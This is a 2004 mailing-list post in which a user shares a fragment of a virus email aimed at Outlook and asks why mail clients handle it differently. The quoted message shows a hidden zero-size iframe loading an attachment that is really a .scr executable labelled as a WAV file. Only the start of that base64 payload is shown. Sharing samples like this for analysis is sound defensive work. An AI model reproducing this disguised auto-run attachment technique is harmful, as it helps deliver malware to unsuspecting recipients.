another virus against M$ LookOut
m.w.chang
toylet
Mon May 17 11:30:18 PDT 2004
Attached is a fragment of it (not 100% original)
A few lines of the message began with non-printable characters. I didn't
check their ASCII value yet.
mozilla didn't treat the fake attachment as attachemnt nor message text.
need to use view message source to discover it.
LookOut! 2000 treated it as an attachemnt (my company is a M$ shop)
puzzling...
-------------- next part --------------
## Received: from Ncyyxma ([210.5.16.6]) by willas-array.com with Microsoft SMTPSVC(5.0.2195.2966);
## Wed, 24 Apr 2002 11:30:38 +0800
## From: SAMUELWAN <SAMUELWAN at willas-array.com>
## To: MWCHANG at willas-array.com
## Subject: Detected
## MIME-Version: 1.0
## Content-Type: multipart/alternative;
## boundary=F3T3F63Y4c3T736971IP
## Return-Path: DICKSONCHEUNG at WILLAS-ARRAY.COM
## Message-ID: <WFS1tKufVma0osA91E9000001eb at willas-array.com>
## X-OriginalArrivalTime: 24 Apr 2002 03:30:38.0968 (UTC) FILETIME=[677BB780:01C1EB40]
## Date: 24 Apr 2002 11:30:38 +0800
##
##
## --F3T3F63Y4c3T736971IP
## Content-Type: text/html;
## Content-Transfer-Encoding: quoted-printable
##
##
##
##<HTML><HEAD></HEAD><BODY>
##
##<iframe src=3Dcid:O9KB4z594 height=3D0 width=3D0>
##<</iframe>
##<<FONT></FONT></BODY></HTML>
##<--F3T3F63Y4c3T736971IP
##<Content-Type: audio/x-wav;
##< name=352.scr
##< Content-Transfer-Encoding: base64
##< Content-ID: <O9KB4z594>
##<TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
##<AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g
##<RE9TIG1vZGUuDQ0KJAAAAAAAAAAYmX3gXPgTs1z4E7Nc+BOzJ+Qfs1j4E7Pf5B2zT/gTs7Tn
##<GbNm+BOzPucAs1X4E7Nc+BKzJfgTs7TnGLNO+BOz5P4Vs134E7NSaWNoXPgTswAAAAAAAAAA
##<UEUAAEwBBAC4jrc8AAAAAAAAAADgAA8BCwEGAADAAAAAkAgAAAAAAFiEAAAAEAAAANAAAAAA
More information about the Linux-users
mailing list